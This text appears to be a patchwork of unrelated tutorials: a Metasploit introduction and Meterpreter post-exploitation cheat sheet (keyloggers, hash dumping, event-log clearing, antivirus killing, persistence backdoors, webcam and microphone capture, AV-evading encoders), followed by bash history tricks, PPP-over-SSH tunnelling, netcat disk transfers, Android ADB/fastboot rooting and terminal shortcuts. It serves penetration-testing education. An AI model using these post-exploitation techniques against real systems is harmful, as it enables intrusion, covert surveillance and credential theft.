Reset Font Size to Original – Ctrl+0
Toggle Full Screen Mode – F11
Reset Terminal – Ctrl+Shift+R
Reset Terminal and Clear Window – Ctrl+Shift+G
Remove all the terminal grouping – Super+Shift+t
Group all Terminal into one – Super+g
Metasploit was developed by HD Moore as an open source project in 2003. Originally written in Perl, Metasploit was completely rewritten in Ruby in 2007. In 2009, it was purchased by Rapid7, an IT security company that also produces the vulnerability scanner Nexpose.
Metasploit is now in version 4.9.3, which is included in our Kali Linux. It's also built into BackTrack. For those of you using some other version of Linux or Unix (including Mac OS), you can download Metasploit from Rapid7's website.
For those of you using Windows, you can also grab it from Rapid7, but I do not recommend running Metasploit in Windows. Although you can download and install it, some of the capabilities of this hacking framework do not translate over to the Windows operating system, and many of my hacks here on Null Byte will not work on the Windows platform.
Metasploit now has multiple products, including Metasploit Pro (the full commercial version) and the Community edition that is built into Kali and remains free. We will focus all of our efforts on the Community edition, as I am well aware that most of you will not be buying the $30,000 Pro edition.
Ways to Use Metasploit
Metasploit can be accessed or used in multiple ways. The most common method, and the one I use, is the interactive Metasploit console. This is the one that is activated by typing msfconsole at the command line in Kali. There are several other methods as well.
Msfcli
First, you can use Metasploit from the command line, or in msfcli mode. Although it appears that when we are in the console we are using the command line, we are actually using an interactive console with special keywords and commands. From the msfcli, we ARE actually using a Linux command line.
We can get the help screen for msfcli by typing:
kali > msfcli -h
Now to execute an exploit from the msfcli, the syntax is simply:
kali > msfcli <exploit> payload=<payload> rhost=<target IP> lhost=<attacker IP> E
Where E is short for execute.
In my tutorial on creating payloads to evade AV software, we used the msfencode and msfpayload commands in this command line (msfcli) mode.
The drawback to using the msfcli is that it is not as well-supported as the msfconsole, and you are limited to a single shell, making some of the more complex exploits impossible.
Armitage
If you want to use Metasploit with a GUI (graphical user interface), at least a couple of options are available. First, Raphael Mudge has developed the Armitage (presumably a reference to a primary character in the seminal cyberhacking science fiction work, Neuromancer—a must read for any hacker with a taste for science fiction).
To start Armitage in Kali, simply type:
kali > armitage
If Armitage fails to connect, try these alternative commands:
kali > service postgresql start
kali > service metasploit start
kali > service metasploit stop
Armitage is a GUI overlay on Metasploit that operates in a client/server architecture. You start Metasploit as a server and Armitage becomes the client, thereby giving you full access to Metasploit's features through a full-featured, though not completely intuitive, GUI. If you really need a GUI to feel comfortable, I don't want to discourage you from using Armitage, but mastering the command line is a necessity for any self-respecting hacker.
Modules
Metasploit has six different types of modules. These are:
payloads
exploits
post
nops
auxiliary
encoders
Payloads are the code that we will leave behind on the hacked system. Some people call these listeners, rootkits, etc. In Metasploit, they are referred to as payloads. These payloads include command shells, Meterpreter, etc. The payloads can be staged, inline, NoNX (bypasses the No execute feature in some modern CPUs), PassiveX (bypasses restricted outbound firewall rules), and IPv6, among others.
Exploits are the shellcode that takes advantage of a vulnerability or flaw in the system. These are operating system specific and many times, service pack (SP) specific, service specific, port specific, and even application specific. They are classified by operating system, so a Windows exploit will not work in a Linux operating system and vice versa.
Post are modules that we can use post exploitation of the system.
Nops are short for No OPerationS. In x86 CPUs, it is usually indicated by the hex 0x90. It simply means "do nothing". This can be crucial in creating a buffer overflow. We can view the nops modules by using the show command.
msf > show nops
Auxiliary includes numerous modules (695) that don't fit into any of the other categories. These include such things as fuzzers, scanners, denial-of-service attacks, and more. Check out my article on auxiliary modules for more in-depth information on this module type.
Encoders are modules that enable us to encode our payloads in various ways to get past AV and other security devices. We can see the encoders by typing:
msf > show encoders
As you can see, there are numerous encoders built into Metasploit. One of my favorites is shikata_ga_nai, which allows us to XOR the payload to help make it undetectable by AV software and security devices.
Searching
Ever since Metasploit 4 was released, Metasploit has added search capabilities. Previously, you had to use the msfcli and grep to find the modules you were looking for, but now Rapid7 has added the search keyword and features. The addition of the search capability was timely, as Metasploit has grown dramatically, and simple eyeball and grep searches were inadequate for searching over 1,400 exploits, for instance.
The search keyword enables us to do simple keyword searches, but it also allows us to be a bit more refined in our search as well. For instance, we can define what type of module we are searching for by using the type keyword.
msf > search type:exploit
When we do so, Metasploit comes back with all 1,295 exploits. Not very useful.
If we know we want to attack a Sun Microsystems machine running Solaris (Sun's UNIX), we may want to refine our search to only Solaris exploits. We can then use the platform keyword.
msf > search type:exploit platform:solaris
Now we have narrowed our search down to only those exploits that will work against a Solaris operating system.
To further refine our search, let's assume we want to attack Solaris RPC (sunrpc) and want to see only those exploits attacking that particular service. We can add the keyword "sunrpc" to our search like below:
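Assuming the standard search syntax, the refined query would look something like this:
msf > search type:exploit platform:solaris sunrpc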
Step 1: Core Commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
Step 2: File System Commands
cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim
Step 3: Networking Commands
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
Step 4: System Commands
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
Step 5: User Interface Commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
Step 6: Privilege Escalation Commands
getsystem - uses 15 built-in methods to gain sysadmin privileges
Step 7: Password Dump Commands
hashdump - grabs the hashes in the password (SAM) file
Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.
Step 8: Timestomp Commands
timestomp - manipulates the modify, access, and create attributes of a file
arp_scanner.rb - Script for performing an ARP's Scan Discovery.
autoroute.rb - Adds routes to the target network through an existing Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting domain admin account list for use.
dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a chrome installation.
enum_firefox.rb - Script for extracting data from Firefox.
enum_logged_on_users.rb - Script for enumerating currently logged-on users and users that have logged in to the system.
enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates Putty connections.
enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Show information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their version.
getcountermeasure.rb - Script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. Provides also the option to kill the processes of detected products and disable the built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Get a list of local subnets based on the host's routes.
get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries in to the Windows Hosts file.
keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
killav.rb - Terminates nearly every antivirus software on victim.
metsvc.rb - Delete one meterpreter service and start another.
migrate - Moves the meterpreter service to another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vista, Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb - Script for injecting a reverse TCP Meterpreter payload into the memory of multiple PIDs; if none is provided, a notepad process will be created and a Meterpreter payload will be injected into each.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets in to a PCAP file.
panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as system in order to work properly. This has currently been tested on Server 2008 and Windows 7, which installs PowerShell by default.
prefetchtool.rb - Script for extracting information from windows prefetch folder.
process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
remotewinenum.rb - This script will enumerate Windows hosts in the target environment, given a username and password or using the credentials under which Meterpreter is running, via the native Windows WMI tool wmic.
scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. Using schtasks command to run them as system. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
screen_dwld.rb - Script that recursively searches for and downloads files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb - This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording, in intervals, the sound captured by the target host's microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload executable file to host.
virtualbox_sysenter_dos - Script to DoS Virtual Box.
virusscan_bypass.rb - Script that kills McAfee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb - Function for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment.
winenum.rb - Enumerates the Windows system, including environment variables, network interfaces, routing, user accounts, etc.
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.
- You can use $_ or !$ to recall the last argument of the previous command.
- Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.) Ranges work too, e.g. !:1-2 or !:10-12.
- Similar to !$, you use !^ for the first argument.
- !$ - last argument from previous command
- !^ - first argument (after the program/built-in/script) from previous command
- !! - previous command (often pronounced "bang bang")
- !n - command number n from history
- !pattern - most recent command matching pattern
- !!:s/find/replace - last command, substitute find with replace
- Use following to take the second argument from the third command in the history,
!3:2
- Use following to take the third argument from the fifth last command in the history,
!-5:3
- !* expands to all arguments of the previous command, letting you run a new command with them (see the quick example below).
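A quick illustration of a few of these designators (the commands and paths are just placeholders):
mkdir -p /tmp/project/src      # create a directory
cd !$                          # reuses the last argument: cd /tmp/project/src
cp file1.txt file2.txt /tmp    # copy two files
echo !^                        # first argument of the previous command: file1.txt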
Event Designators
An event designator is a reference to a command line entry in the history list. Unless the reference is absolute, events are relative to the current position in the history list.
!
Start a history substitution, except when followed by a space, tab, the end of the line, ‘=’ or ‘(’ (when the extglob shell option is enabled using the shopt builtin).
!n
Refer to command line n.
!-n
Refer to the command n lines back.
!!
Refer to the previous command. This is a synonym for ‘!-1’.
!string
Refer to the most recent command preceding the current position in the history list starting with string.
!?string[?]
Refer to the most recent command preceding the current position in the history list containing string. The trailing ‘?’ may be omitted if the string is followed immediately by a newline.
^string1^string2^
Quick Substitution. Repeat the last command, replacing string1 with string2. Equivalent to !!:s/string1/string2/.
!#
The entire command line typed so far.
9.3.2 Word Designators
Word designators are used to select desired words from the event. A ‘:’ separates the event specification from the word designator. It may be omitted if the word designator begins with a ‘^’, ‘$’, ‘*’, ‘-’, or ‘%’. Words are numbered from the beginning of the line, with the first word being denoted by 0 (zero). Words are inserted into the current line separated by single spaces.
For example,
!!
designates the preceding command. When you type this, the preceding command is repeated in toto.
!!:$
designates the last argument of the preceding command. This may be shortened to !$.
!fi:2
designates the second argument of the most recent command starting with the letters fi.
Here are the word designators:
0 (zero)
The 0th word. For many applications, this is the command word.
n
The nth word.
^
The first argument; that is, word 1.
$
The last argument.
%
The word matched by the most recent ‘?string?’ search.
x-y
A range of words; ‘-y’ abbreviates ‘0-y’.
*
All of the words, except the 0th. This is a synonym for ‘1-$’. It is not an error to use ‘*’ if there is just one word in the event; the empty string is returned in that case.
x*
Abbreviates ‘x-$’
x-
Abbreviates ‘x-$’ like ‘x*’, but omits the last word.
If a word designator is supplied without an event specification, the previous command is used as the event.
Modifiers
After the optional word designator, you can add a sequence of one or more of the following modifiers, each preceded by a ‘:’.
h
Remove a trailing pathname component, leaving only the head.
t
Remove all leading pathname components, leaving the tail.
r
Remove a trailing suffix of the form ‘.suffix’, leaving the basename.
e
Remove all but the trailing suffix.
p
Print the new command but do not execute it.
q
Quote the substituted words, escaping further substitutions.
x
Quote the substituted words as with ‘q’, but break into words at spaces, tabs, and newlines.
s/old/new/
Substitute new for the first occurrence of old in the event line. Any delimiter may be used in place of ‘/’. The delimiter may be quoted in old and new with a single backslash. If ‘&’ appears in new, it is replaced by old. A single backslash will quote the ‘&’. The final delimiter is optional if it is the last character on the input line.
&
Repeat the previous substitution.
g
a
Cause changes to be applied over the entire event line ('a' is a synonym for 'g'). Used in conjunction with 's', as in gs/old/new/, or with '&'.
G
Apply the following ‘s’ modifier once to each word in the event.
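A quick illustration of the h, t and s modifiers (the path is just a placeholder):
ls /etc/ssh/sshd_config
echo !$:h        # prints /etc/ssh (head: strip the filename)
echo !-2:$:t     # prints sshd_config (tail: strip the directory part)
!-3:s/sshd/ssh/  # reruns the ls with sshd_config replaced by ssh_config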
PPP (Point to Point Protocol) is a mechanism for running IP (Internet Protocol) over a terminal. Usually the terminal is a modem, but any tty will do. SSH creates secure ttys. Running a PPP connection over an SSH connection makes for an easy, encrypted VPN. (SSH has native tunneling support which requires root access, this method only requires root privileges on the client.)
If you run any flavor of *nix (Free/Open/NetBSD, Linux, etc.), chances are everything you need is already installed (ppp and ssh). And since SSH uses a single client/server TCP connection, it NATs cleanly, easily passing through firewalls and NAT routers. It has its drawbacks though, as you end up with PPP (TCP) inside of SSH (TCP), which is a bad idea.
On the remote end, install pppd if not already installed,
apt-get install ppp
Enable IP forwarding by editing /proc/sys/net/ipv4/ip_forward,
echo 1 > /proc/sys/net/ipv4/ip_forward
Configure your iptables settings to enable access for PPP Clients,
iptables -F FORWARD
iptables -A FORWARD -j ACCEPT
iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE
iptables -A POSTROUTING -t nat -o ppp+ -j MASQUERADE
And make sure you can login without a password.
On the local end, start pppd, tell it to connect using SSH in batch mode, start pppd on the remote server, and use the SSH connection as the communication channel.
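A sketch of such a command, assuming root on both ends, passwordless SSH to root@remote-host, and the 10.0.0.1/10.0.0.2 addresses used below:
pppd updetach noauth silent nodeflate pty "ssh root@remote-host pppd nodetach notty noauth" ipparam vpn 10.0.0.1:10.0.0.2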
When run, both your local and your remote computers will have new PPP network interfaces,
Local interface ppp0 with IP address 10.0.0.1
Remote interface ppp0 with IP address 10.0.0.2
Once pppd adds a default route via ppp0, all traffic will be routed through the tunnel, and SSH will go down because the OS will try to route the tunnel through the tunnel. To fix that, we add a route to remote-host via the local gateway.
route add $remote gw $gateway
The OS will then send all SSH traffic to remote-host through our default gateway, so the tunnel keeps working fine; the rest of the traffic goes through the tunnel.
The script below automates all of the steps above: when run, it will figure out the current gateway, then set up the tunnel and the routes so all traffic goes through the tunnel.
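A minimal sketch of such a script (remote-host and the 10.0.0.x addresses are placeholders; the original script may differ):
#!/bin/sh
# Sketch: bring up a PPP-over-SSH tunnel and route all traffic through it.
REMOTE=remote-host                                        # placeholder: the SSH server
GATEWAY=$(ip route | awk '/^default/ {print $3; exit}')   # current default gateway
REMOTE_IP=$(getent hosts "$REMOTE" | awk '{print $1; exit}')

# Keep reaching the SSH server via the old gateway so the tunnel does not route itself.
route add -host "$REMOTE_IP" gw "$GATEWAY"

# Start PPP over SSH (local end 10.0.0.1, remote end 10.0.0.2).
pppd updetach noauth silent nodeflate \
  pty "ssh root@$REMOTE pppd nodetach notty noauth" \
  ipparam vpn 10.0.0.1:10.0.0.2

# Replace the default route so everything else goes through the tunnel.
route del default
route add default gw 10.0.0.2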
Netcat is like a swiss army knife for geeks. It can be used for just about anything involving TCP or UDP. One of its most practical uses is to transfer files. Non-*nix people usually don't have SSH set up, and it is much faster to transfer stuff with netcat than to set up SSH. netcat is just a single executable, and works across all platforms (Windows, Mac OS X, Linux).
On the receiving end running,
nc -l -p 1234 > out.file
will begin listening on port 1234.
On the sending end running,
nc -w 3 [destination] 1234 < out.file
will connect to the receiver and begin sending the file.
For faster transfers, if both sender and receiver have some basic *nix tools installed, you can compress the file during the sending process, for example as shown below.
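A hedged sketch using tar and gzip on both ends (the port, paths and [destination] are placeholders):
# receiver: listen, decompress, unpack
nc -l -p 1234 | tar xzvf -
# sender: pack, compress, send
tar czvf - /path/to/dir | nc -w 3 [destination] 1234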
A much cooler but less useful use of netcat is that it can transfer an image of a whole hard drive over the wire using a command called dd.
On the sender end run,
dd if=/dev/hda3 | gzip -9 | nc -l 3333
On the receiver end,
nc [destination] 3333 | pv -b > hdImage.img.gz
Be warned that file transfers using netcat are not encrypted, anyone on the network can grab what you are sending, so use this only on trusted networks.
WHAT IS ADB/FASTBOOT
ADB and fastboot commands on PC are used to perform different command line operations on device through USB in ROM/Recovery and bootloader mode respectively.
Android Debug Bridge (ADB) is basically used by developers to identify and fix bugs in the OS (ROM). ADB works in both ROM and recovery.
Fastboot works in bootloader mode even when the phone is not booted into recovery or ROM, or even if Android isn't installed on the phone. In the latter case, the bootloader can be accessed with a certain button combination while powering on the device; usually Power + Vol. Down.
Fastboot/ADB setup has to be done on the PC to use this mode. ADB mode has more flexibility than fastboot as it supports more types of flashable files. ADB also supports backing up apps and data. ADB/fastboot commands can be used to flash recovery and boot images. They can also flash a ROM zip, and can flash supersu.zip by booting into recovery to gain root access. And above all, it is the only way to unlock the bootloader, without which the device functionality is too limited. Read here why we need to unlock the bootloader.
In bootloader mode, usually boot logo appears on device screen.
SETUP
Enable USB Debugging in Settings > Developer Options. If not available, Dev. Options can be accessed by tapping Build Number 5 (or 7) times in Settings > About Phone.
Allow ADB root access in Dev. Options or SuperSU. Some commands need root.
Allow data transfer over ADB when prompted on device screen. Otherwise you might get errors like device unauthorized etc. So keep screen unlocked at first connect.
Disable MTP, PTP, UMS etc. from USB computer connection on device to avoid any interruptions.
Install Android SDK or simply install 15 Seconds ADB Setup 1.4.2. It works up to Android Lollipop (AOSP 5). Credits to Snoop05
Windows 8.1 users who got error installing this setup should first install Windows Update KB2917929.
You will have to navigate to the adb folder each time you start cmd, or set up adb to work globally. On your PC, go to System Properties > Advanced System Settings > Environment Variables. Click on New (User Variables). Variable Name: ADB (or anything you want). Variable Value: ;C:\adb (if you installed the 15 seconds setup) or ;C:\SDK\platform-tools.
Install ADB USB Drivers for your Android Device. To do this automatically, download and run ADB Driver Installer. Connect device through USB cable and install drivers.
NOTE: Spaces in file paths don't work in adb commands. Non-English characters and languages don't work either. Also the commands are case-sensitive.
There is a long list of adb/fastboot commands to perform numerous operations. Here are a few of those being listed keeping in view certain tasks:
COMMON COMMANDS
On PC run Command Prompt as Administrator.
To check connected devices when ROM is running on phone:
Code:
adb devices
To boot into bootloader mode:
Code:
adb reboot bootloader
To check connected devices when in bootloader mode:
Code:
fastboot devices
To boot into ROM:
Code:
fastboot reboot
To boot into recovery:
Code:
fastboot reboot recovery
There are some common Linux commands which can be used in combination with these commands to perform certain operation. However, ADB | FASTBOOT is not necessarily required for these Linux commands. These can be run directly from Terminal Emulator in ROM or Custom Recovery. Some of them are given below.
UNLOCK BOOTLOADER
NOTE: Some newer devices don't allow unlocking of bootloader directly to ensure more security. Instead an official method is provided to unlock BL using PC.
Read here to know about the risks of BL unlocking.
To check the bootloader status:
Code:
fastboot oem device-info
“True” on unlocked status.
If "false", run the following to unlock:
Code:
fastboot oem unlock
WIPE DATA (FORMAT PARTITION)
This will erase your data.
Code:
fastboot format:ext4 userdata
It can be performed on other flash partitions as well. A general syntax is 'fastboot format:FS PARTITION'
FLASH RECOVERY
Download recovery.img (specific for your device) to adb folder.
To test the recovery without permanently flashing, run the following:
Code:
fastboot boot recovery.img
On the next reboot, the device will revert to the previously installed recovery, since nothing was flashed.
Or to permanently flash recovery, run:
Code:
fastboot flash recovery recovery.img
Stock ROMs often tend to replace a custom recovery with the stock one on the first reboot. That's why booting into recovery is recommended before booting into the ROM.
FLASH KERNEL
Download boot.img (specific for your device) to adb folder and run following:
Code:
fastboot flash boot boot.img
FLASH ROM
Download ROM.zip (for your device) created for fastboot i.e. with android-info.txt and android-product.txt.
To wipe your device and then to flash .zip:
Code:
fastboot -w
fastboot update ROM.zip
GAIN ROOT (Not recommended method. Better flash directly through custom recovery).
Root is required to modify the contents of /system. You can read here further.
Download (flashable) supersu.zip and custom or modified recovery.img (having support to flash .zip files) to adb folder and run the following:
Code:
fastboot boot recovery.img
Now once you are in recovery, adb will work instead of fastboot.
To copy files from PC to device and then to extract files, run the following:
Code:
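A minimal sketch, assuming the flashable supersu.zip sits in the adb folder and a TWRP recovery is booted (otherwise flash the zip from the recovery's own menu):
adb push supersu.zip /sdcard/
adb shell twrp install /sdcard/supersu.zip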
COPY WHOLE PARTITION IMAGE (within device)
This method can be used to backup whole device e.g. to backup /data/ including /data/media/ i.e. Internal SD Card which isn't backed up by custom recovery (TWRP). Or you can get any partition image for development purpose. This method retains complete directory structure as well as file permissions, attributes and contexts.
To jump from windows command prompt to android device shell:
Code:
adb shell
These commands can also be given from Recovery Terminal instead of ADB.
To get SuperUser access (in ROM):
Code:
su
To list all available partitions or mount points on device:
Code:
cat /proc/partitions
Or go to "/dev/block/platform/" folder on device. Search for the folder having folder "by-name" inside it. It's msm_sdcc.1 (on Nokia X2). Run the following:
Code:
ls -al /dev/block/platform/*/by-name
Or simply use DiskInfo app to get partition name you want to copy. Say you want to copy /data (userdata) partition. On Nokia X2DS, it is mmcblk0p25.
To copy the partition to your SD card:
Code:
dd if=/dev/block/mmcblk0p25 of=/sdcard/data.img
data.img will be copied to your SD card.
It also works inversely (restore):
Code:
dd if=/sdcard/data.img of=/dev/block/mmcblk0p25
data.img from your SD card will be written to device.
Similarly you can copy system.img, boot.img or any other partition. However, boot.img and some other partitions may not be copyable from within the ROM but only in recovery mode. So better use recovery for dd, except if you're going to dd the recovery partition itself. You can read here more about Android partitions.
COPY WHOLE FOLDER (within device)
This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).
To jump from windows command prompt to android device shell:
Code:
adb shell
These commands can also be given from Recovery Terminal.
To get SuperUser access (in ROM):
Code:
su
To copy from Internal Memory to SD Card:
Code:
cp -a /data/media/0/. /external_sd/internal_backup/
Or if you don't have SU permission:
Code:
cp -a /external_sd/. /sdcard/
To copy from SD Card to Internal Memory:
Code:
cp -a /external_sd/internal_backup/. /data/media/0/
However, if you are copying to an SD card with a FAT32 file system, the Android permissions of the files won't be retained and you will have to fix permissions yourself. In this case, you can use the tar command to create an archive of the files along with their attributes (permissions: mode & ownership, time-stamps) and security contexts. But the FAT32 FS also has a limitation of 4GB maximum file size. You may use the "split" command along with "tar" to split the archive into smaller blocks (see the sketch after the tar examples below). Or use an exFAT or ext4 filesystem for larger file support. ext4 gives a higher write speed on Android but is not supported in Windows, i.e. the SD card can't be mounted in Windows; MTP however still works.
To jump from windows command prompt to android device shell:
Code:
adb shell
To get SuperUser access (in ROM):
Code:
su
To copy from Internal Memory to SD Card:
Code:
tar cvpf /external_sd/internal_backup/media.tar /data/media/0/
To extract from SD Card to Internal Memory (along with path):
Code:
tar -xvf /external_sd/internal_backup/media.tar
To extract from SD Card to some other location, use "-C":
Code:
tar -xvf /external_sd/internal_backup/media.tar -C /data/media/0/extracted_archive/
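Regarding the split note above, a hedged sketch for a FAT32 card (the chunk size and paths are placeholders):
# create the archive in chunks below the 4GB FAT32 limit
tar cvpf - /data/media/0/ | split -b 3900m - /external_sd/internal_backup/media.tar.part_
# restore: join the chunks and extract (paths inside the archive are relative to /)
cat /external_sd/internal_backup/media.tar.part_* | tar xvpf - -C /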
COPY WHOLE FOLDER (From/To PC)
This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).
After copying from PC to the device's Internal Memory (/data/media/), you might get a Permission Denied error, e.g. apps can't write to or even read from Internal Memory. This is because Android (Linux) and Windows have different file permission systems. To FIX PERMISSIONS, boot into recovery and run the following commands:
(Credits to xak944 )
Code:
adb shell
To take ownership of whole "media" directory:
Code:
chown -R media_rw:media_rw /data/media/
To fix permissions of directories:
Code:
find /data/media/ -type d -exec chmod 775 '{}' ';'
To fix permissions of files:
Code:
find /data/media/ -type f -exec chmod 664 '{}' ';'
PASSING FASTBOOT ARGUMENTS
Fastboot supports passing options. For example, while booting a modified kernel image with framebuffer console support, the console device and its font can be provided as options:
Code:
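A hedged example (the kernel image name and the console parameters are placeholders and depend on the device):
fastboot -c "console=tty0,115200 fbcon=font:VGA8x8" boot boot.img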
Working With Processes
Use the following shortcuts to manage running processes.
Ctrl+C: Interrupt (kill) the current foreground process running in the terminal. This sends the SIGINT signal to the process, which is technically just a request—most processes will honor it, but some may ignore it.
Ctrl+Z: Suspend the current foreground process running in bash. This sends the SIGTSTP signal to the process. To return the process to the foreground later, use the fg command (optionally with a job spec such as %1).
Ctrl+D: Close the bash shell. This sends an EOF (End-of-file) marker to bash, and bash exits when it receives this marker. This is similar to running the exit command.
Controlling the Screen
The following shortcuts allow you to control what appears on the screen.
Ctrl+L: Clear the screen. This is similar to running the “clear” command.
Ctrl+S: Stop all output to the screen. This is particularly useful when running commands with a lot of long, verbose output, but you don’t want to stop the command itself with Ctrl+C.
Ctrl+Q: Resume output to the screen after stopping it with Ctrl+S.
Moving the Cursor
Use the following shortcuts to quickly move the cursor around the current line while typing a command.
Ctrl+A or Home: Go to the beginning of the line.
Ctrl+E or End: Go to the end of the line.
Alt+B: Go left (back) one word.
Ctrl+B: Go left (back) one character.
Alt+F: Go right (forward) one word.
Ctrl+F: Go right (forward) one character.
Ctrl+XX: Move between the beginning of the line and the current position of the cursor. This allows you to press Ctrl+XX to return to the start of the line, change something, and then press Ctrl+XX to go back to your original cursor position. To use this shortcut, hold the Ctrl key and tap the X key twice.
Deleting Text
Use the following shortcuts to quickly delete characters:
Ctrl+D or Delete: Delete the character under the cursor.
Alt+D: Delete all characters after the cursor on the current line.
Ctrl+H or Backspace: Delete the character before the cursor.
Fixing Typos
These shortcuts allow you to fix typos and undo your key presses.
Alt+T: Swap the current word with the previous word.
Ctrl+T: Swap the last two characters before the cursor with each other. You can use this to quickly fix typos when you type two characters in the wrong order.
Ctrl+_: Undo your last key press. You can repeat this to undo multiple times.
Cutting and Pasting
Bash includes some basic cut-and-paste features.
Ctrl+W: Cut the word before the cursor, adding it to the clipboard.
Ctrl+K: Cut the part of the line after the cursor, adding it to the clipboard.
Ctrl+U: Cut the part of the line before the cursor, adding it to the clipboard.
Ctrl+Y: Paste the last thing you cut from the clipboard. The y here stands for “yank”.
Capitalizing Characters
The bash shell can quickly convert characters to upper or lower case:
Alt+U: Capitalize every character from the cursor to the end of the current word, converting the characters to upper case.
Alt+L: Uncapitalize every character from the cursor to the end of the current word, converting the characters to lower case.
Alt+C: Capitalize the character under the cursor. Your cursor will move to the end of the current word.
Tab Completion
Tab completion is a very useful bash feature. While typing a file, directory, or command name, press Tab and bash will automatically complete what you’re typing, if possible. If not, bash will show you various possible matches and you can continue typing and pressing Tab to finish typing.
Tab: Automatically complete the file, directory, or command you’re typing.
